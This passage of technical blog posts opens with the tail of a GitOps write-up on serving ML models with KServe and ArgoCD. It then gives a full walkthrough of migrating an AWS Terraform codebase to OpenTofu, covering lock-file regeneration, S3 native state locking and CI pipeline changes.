    - fraud-detector.ml-serving.svc.cluster.local
  http:
    - route:
        - destination:
            host: fraud-detector-v2-4-1-predictor
            port:
              number: 8080
          weight: 90
        - destination:
            host: fraud-detector-v2-5-0-predictor
            port:
              number: 8080
          weight: 10

Both the InferenceService and the VirtualService are in Git. The traffic split is in Git. Everything is auditable and revertible.

Results

I won't pretend I have clean before/after numbers from a single project because this pattern spans multiple engagements. Here's what consistently holds:

Metric	Before	After
Model deployment method	Manual SSH or ad-hoc scripts	PR-gated, Git-backed
Audit trail	None or Slack history	Full Git history
Rollback time	30 minutes to hours	One `git revert`, seconds
Canary traffic split	Not possible without Istio knowledge	Config field in YAML
Time to detect config drift	Never (no baseline)	Continuous, ArgoCD UI
Secret management	Often hard-coded or in `.env` files	IRSA, no credentials in Git

The operational improvement that surprises people most: the on-call burden drops significantly when you can answer "what version is running, what changed, who approved it" in under 30 seconds by looking at Git.

Lessons Learned

1. The ignoreDifferences config is not optional. Skip it and you'll spend a weekend wondering why ArgoCD is perpetually out of sync when nothing real has changed. KServe mutates its own resources. Tell ArgoCD which fields to ignore.

2. Model size determines your storage strategy. Under 500MB, the default S3 init container approach is fine. Over a few GB, you need a shared model cache PVC or a pre-baked image. Planning this up front saves a painful migration later.

3. Always set nodeSelector for GPU workloads. Without it, a pod that requests nvidia.com/gpu can still land on the wrong GPU type, and one that is missing the GPU request can land on a CPU node and silently fall back to CPU inference. Set the affinity, set the tolerations, pin it.

4. Start with RawDeployment mode. Knative is powerful but it adds complexity. Get the core pattern working first, then add Knative if you genuinely need scale-to-zero economics.

5. GitOps creates friction on purpose. The PR workflow adds a step that direct kubectl apply doesn't. That step is the point. If your team resents the friction, they haven't lived through the 2am incident where nobody knows what changed.

Try It Yourself

The five things you actually need to get started:

KServe installed (Helm, RawDeployment mode, cert-manager prerequisite)
A models-manifests repo with InferenceService YAML per model, Kustomize overlays for environments
ArgoCD Application pointing at overlays/production, selfHeal: true, with ignoreDifferences on KServe status fields
IRSA or Workload Identity for S3 access
Branch protection on main so model version bumps require PR review

The canary rollout and GitHub Actions webhook are enhancements. Get the core working first.

I Migrated a Real Production Codebase from Terraform to OpenTofu (Here's What Broke)

Mateen Anjum — Sun, 08 Mar 2026 06:25:03 +0000

TL;DR: Migrating a standard AWS Terraform codebase to OpenTofu took half a day, most of which was CI pipeline updates. The S3 native locking alone made it worth it.

The Problem

I've been writing Terraform since version 0.8. Watched it grow from a scrappy infrastructure tool into the de-facto standard for cloud automation. I've migrated teams from CloudFormation to Terraform, written custom providers, debugged state corruption at 2 AM. Terraform is baked into how I think about infrastructure.

So when HashiCorp switched to the Business Source License in August 2023, I did what most practitioners did: I shrugged, bookmarked the OpenTofu repo, and went back to building.

That bookmark sat there for two years.

The BSL doesn't prevent you from using Terraform. It prevents you from building a product or service that's "substantially similar" to Terraform Cloud or Terraform Enterprise. For most teams running internal infrastructure, the risk is low. But once you're building a platform team that exposes self-service infrastructure to internal customers, or packaging IaC automation as part of a managed service, your legal team might want a conversation. And once "get legal sign-off on our IaC toolchain" is on the agenda, you've already lost an afternoon you'll never get back.

For a Phono Technologies project, we were building a lightweight CI/CD orchestration layer for client infrastructure. The moment I tried to describe it, I realized I was describing exactly what the BSL restricts. The ambiguity was real enough that I wanted it gone.

What I Tried First (And Why It Failed)

My first instinct was to just drop in the tofu binary and run tofu init. Simple enough.

It almost worked. Until I checked where providers were being pulled from.

OpenTofu fetches providers from registry.opentofu.org, not registry.terraform.io. The registries mirror each other for HashiCorp providers, but your existing .terraform.lock.hcl was generated against Terraform's registry. The provider hashes don't match.

Error: Failed to install provider

To install this provider, OpenTofu needs to verify that the checksums in
.terraform.lock.hcl match the provider packages downloaded from the registry.
The following packages are required but the checksums don't match:
  registry.opentofu.org/hashicorp/aws v5.82.0

I also ran into teammates who still had the old Terraform-generated lock files. Some ran tofu plan on their local branches and got hash mismatches in the other direction. The lesson: this has to be a coordinated team migration, not a quiet swap on your own laptop.
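
Before the cutover, it helps to know which registry each lock file in the repo was generated against. Here's a small scanner, offered as a sketch: the function name is mine, the regex assumes the usual provider "host/namespace/name" { header at the start of a line, and the sample lock file content is illustrative (the random provider version in particular is made up).

```python
import re
from collections import Counter

# Matches lock file headers such as: provider "registry.terraform.io/hashicorp/aws" {
PROVIDER_RE = re.compile(r'^provider\s+"([^"/]+)/([^"]+)"\s*\{', re.MULTILINE)


def registries_in_lock_file(text):
    """Count provider entries per registry host in .terraform.lock.hcl text."""
    return Counter(match.group(1) for match in PROVIDER_RE.finditer(text))


sample = '''
provider "registry.terraform.io/hashicorp/aws" {
  version = "5.82.0"
}

provider "registry.opentofu.org/hashicorp/random" {
  version = "3.6.3"
}
'''

counts = registries_in_lock_file(sample)
print(dict(counts))
```

Any registry.terraform.io entry left after the cutover date points at a branch that still needs its lock file regenerated.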

The Solution

The codebase: a mid-sized AWS platform for a SaaS client. Around 8,000 lines of Terraform across 12 modules. Standard providers: aws, kubernetes, helm, random, tls. S3 backend for state, one workspace per environment. CI via GitHub Actions. No Terraform Cloud, no HCP.

Step 1: Back up everything

Before touching anything, tag the current state in git and pull a snapshot of your state file:

git tag pre-opentofu-migration

terraform state pull > terraform.tfstate.backup-$(date +%Y%m%d)

If you're on S3, enable versioning before you start. You want a timestamped rollback point. Non-negotiable.

Step 2: Install tofu alongside terraform

The two binaries coexist without conflict:

brew install opentofu
tofu --version
# OpenTofu v1.11.4
# on darwin_arm64

Keep terraform installed until you're confident the migration is complete.

Step 3: Delete the lock file and re-init

rm .terraform.lock.hcl
tofu init

tofu init regenerates the lock file with provider entries and hashes recorded against registry.opentofu.org. Commit the new lock file and tell your team to re-run tofu init on their local copies.

Once you commit the new lock file, treat the repo as an OpenTofu project. Don't run terraform init on the same directory afterward. The two binaries will fight over hashes.

Step 4: Check your `terraform {}` block

You don't have to rename it. OpenTofu still accepts the terraform {} block. Your existing HCL works without modification.

# This works fine in OpenTofu, no changes needed
terraform {
  required_version = ">= 1.5.0"

  required_providers {
    aws = {
      source  = "hashicorp/aws"
      version = "~> 5.0"
    }
  }

  backend "s3" {
    bucket         = "my-terraform-state"
    key            = "production/terraform.tfstate"
    region         = "us-east-1"
    encrypt        = true
    dynamodb_table = "terraform-state-locks"
  }
}

Leave it as terraform {}. OpenTofu has no tofu {} block to rename it to.

Step 5: Verify with `tofu plan`

tofu plan -out=migration-test.tfplan

Expected result: no changes. If you see changes, do not apply. Investigate first. It usually means a provider version difference or a schema update.

I got zero changes across all three environments.
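
If you want CI to enforce the "no changes" result rather than eyeballing it, tofu plan accepts -detailed-exitcode: 0 means an empty diff, 2 means changes are present, and 1 means the plan failed. A minimal wrapper might look like this. The function names are hypothetical, and run_plan_check assumes the tofu binary is on PATH and the directory is already initialized.

```python
import subprocess


def interpret_plan_exit_code(code):
    """Map a `tofu plan -detailed-exitcode` exit status to a verdict."""
    if code == 0:
        return "no changes"
    if code == 2:
        return "changes present"
    return "error"


def run_plan_check(workdir="."):
    """Run the plan and return the verdict. Requires tofu to be installed."""
    result = subprocess.run(
        ["tofu", "plan", "-detailed-exitcode", "-input=false"],
        cwd=workdir,
    )
    return interpret_plan_exit_code(result.returncode)


print(interpret_plan_exit_code(0))
```

During the migration, anything other than "no changes" should stop the pipeline before an apply can happen.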

Step 6: Drop DynamoDB for S3 native locking

This is where OpenTofu pulls ahead. OpenTofu 1.10.0 added native conditional writes for S3 state locking. No DynamoDB table required.

Before:

backend "s3" {
  bucket         = "my-state-bucket"
  key            = "prod/terraform.tfstate"
  region         = "us-east-1"
  encrypt        = true
  dynamodb_table = "terraform-locks"
}

After:

backend "s3" {
  bucket       = "my-state-bucket"
  key          = "prod/terraform.tfstate"
  region       = "us-east-1"
  encrypt      = true
  use_lockfile = true
}

Fewer moving parts. One less AWS service to manage. Simpler IAM permissions.
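
The idea behind locking with conditional writes is simple: create a lock object only if it doesn't already exist, and treat a failed create as "someone else holds the lock." The sketch below shows that idea with an in-memory stand-in for the bucket. It is a conceptual illustration, not OpenTofu's implementation: the class, the function names, and the lock object suffix are all placeholders.

```python
class InMemoryBucket:
    """Stand-in for an object store that supports create-if-absent writes."""

    def __init__(self):
        self._objects = {}

    def put_if_absent(self, key, body):
        """Store `body` under `key` only if the key is free. Returns success."""
        if key in self._objects:
            return False
        self._objects[key] = body
        return True

    def delete(self, key):
        self._objects.pop(key, None)


LOCK_SUFFIX = ".lock"  # placeholder name, not necessarily what OpenTofu writes


def acquire_lock(bucket, state_key, owner):
    """Try to take the lock for a state file. False means it is already held."""
    return bucket.put_if_absent(state_key + LOCK_SUFFIX, owner)


def release_lock(bucket, state_key):
    bucket.delete(state_key + LOCK_SUFFIX)


bucket = InMemoryBucket()
first = acquire_lock(bucket, "prod/terraform.tfstate", "alice")
second = acquire_lock(bucket, "prod/terraform.tfstate", "bob")
release_lock(bucket, "prod/terraform.tfstate")
third = acquire_lock(bucket, "prod/terraform.tfstate", "bob")
print(first, second, third)
```

The lock lives next to the state it protects, which is why the separate DynamoDB table stops being necessary.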

Step 7: Update your CI pipeline

Every place your pipeline runs terraform, you need tofu. In GitHub Actions:

Before:

- uses: hashicorp/setup-terraform@v3
  with:
    terraform_version: "1.9.5"

After:

- uses: opentofu/setup-opentofu@v1
  with:
    tofu_version: "1.11.4"

The opentofu/setup-opentofu action is the official GitHub Action. Clean swap.
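
Since the workflow pins an exact version, a small guard can stop someone from loosening it to a range later. This is a sketch: is_exact_pin is a hypothetical helper, and it only accepts plain MAJOR.MINOR.PATCH strings.

```python
import re

EXACT_VERSION = re.compile(r"\d+\.\d+\.\d+")


def is_exact_pin(version):
    """True only for a full MAJOR.MINOR.PATCH version with no range operators."""
    return EXACT_VERSION.fullmatch(version.strip()) is not None


for candidate in ["1.11.4", "1.11", "~1.11.0", "latest"]:
    print(candidate, is_exact_pin(candidate))
```

Run it against the tofu_version value in your workflow file as part of linting.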

Results

Metric	Before	After
State locking dependencies	S3 + DynamoDB	S3 only
DynamoDB tables	3 (one per environment)	0
Migration time	N/A	4 hours (including CI updates)
Plan output differences	N/A	None
Sensitive values in state	Persisted	Ephemeral (with 1.11 features)

The operational simplicity of dropping DynamoDB is hard to quantify in a table. It's one less service in IAM policies, one less resource to manage in the state backend module, one less thing that can drift or get misconfigured.

Lessons Learned

Coordinate the lock file migration as a team. If half your team is still running terraform init, you'll get hash conflicts. Announce the cutover date, have everyone delete and regenerate their lock files on the same day.
Pin your OpenTofu version in CI. The 1.11.x patch cycle had a notable regression in 1.11.0 that was fixed in 1.11.2. The team moves fast. Pin to an exact patch version in CI and upgrade deliberately.
The terraform {} block is fine. Don't waste time renaming it. The binary changed; the HCL didn't.
The point of no return is tofu apply. After you run apply, the state metadata reflects OpenTofu's version. You can still read the state with Terraform, but you'll get warnings. Decide before you apply whether you're committed.
Ephemeral values are worth understanding. OpenTofu 1.11.0 introduced ephemeral resources and write-only attributes. Sensitive credentials can be used without ever landing in state. If you've been papering over this with Vault workarounds, it's worth reading the docs before you finish the migration.

ephemeral "aws_secretsmanager_secret_version" "db_password" {
  secret_id = aws_secretsmanager_secret.db.id
}

resource "kubernetes_secret_v1" "db_credentials" {
  metadata {
    name      = "db-credentials"
    namespace = "app"
  }

  data_wo = {
    password = ephemeral.aws_secretsmanager_secret_version.db_password.secret_string
  }

  data_wo_revision = 1
}

Try It Yourself

OpenTofu Migration Guide: opentofu.org/docs/intro/migration